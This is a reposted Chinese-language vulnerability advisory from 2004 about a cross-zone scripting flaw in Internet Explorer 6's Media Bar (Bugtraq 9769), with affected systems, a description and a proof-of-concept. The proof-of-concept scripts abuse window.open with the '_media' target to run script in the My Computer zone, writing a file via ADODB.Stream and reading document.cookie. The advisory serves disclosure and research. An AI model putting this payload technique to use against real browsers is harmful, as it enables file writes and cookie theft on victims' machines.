首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Microsoft IE window.open Media Bar跨域脚本漏洞
来源:vfocus.net 作者:vitter 发布时间:2004-03-10  

Microsoft Internet Explorer window.open Media Bar跨域脚本漏洞

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9769

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer在处理媒介栏(Media Bar)时对输入缺少充分过滤,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,可获得敏感信息。

问题是通过'window.open'方法在'_media'属性中插入恶意脚本代码,IE浏览没有进行充分过滤,当目标用户打开此链接时,包含的恶意脚本就会在用户浏览器上,以我的电脑域权限执行,可导致敏感信息泄露。

<*来源:Cheng Peng Su (apple_soup@msn.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107833057714330&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cheng Peng Su (apple_soup@msn.com)提供了如下测试方法:

<script>

// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';

inject_html="<img src='" + img_src + "'>";

window.open('file:javascript:document.write("' + inject_html + '")','_media');

</script>

<script>

window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);

</script>

演示页面可参考如下:

http://www.freewebs.com/applesoup/CrossMediaBar/demo.html
http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Adobe Acrobat Reader软件发现严
·Microsoft IE window.open搜索格
·Sun Solaris conv_fix未明文件覆
·QMAIL qmail-qmtpd RELAYCLIENT
·Sun Solaris未明passwd命令权限
·IBM DB2 远程命令执行权提升漏洞
·MS04-009 MS Outlook存在允许远
·FreeBSD未授权受限进程挂接漏洞
·MS04-010 Microsoft MSN Messeng
·Microsoft Internet Explorer 跨
·WinZip MIME 解析缓冲溢出漏洞
·如何获得SUNOS的ROOT权限(初级篇
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved